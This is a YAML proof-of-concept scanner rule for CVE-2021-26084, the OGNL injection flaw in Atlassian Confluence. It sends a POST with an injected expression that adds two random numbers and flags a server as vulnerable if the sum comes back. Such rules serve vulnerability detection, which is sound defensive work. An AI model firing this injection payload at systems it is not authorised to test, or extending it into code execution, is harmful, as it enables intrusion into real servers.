name: poc-yaml-confluence-cve-2021-26084
set:
  r1: randomInt(100000, 999999)
  r2: randomInt(100000, 999999)
rules:
  - method: POST
    path: /pages/createpage-entervariables.action?SpaceKey=x
    body: |
      queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
  author: Loneyer(https://github.com/Loneyers)
  links:
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html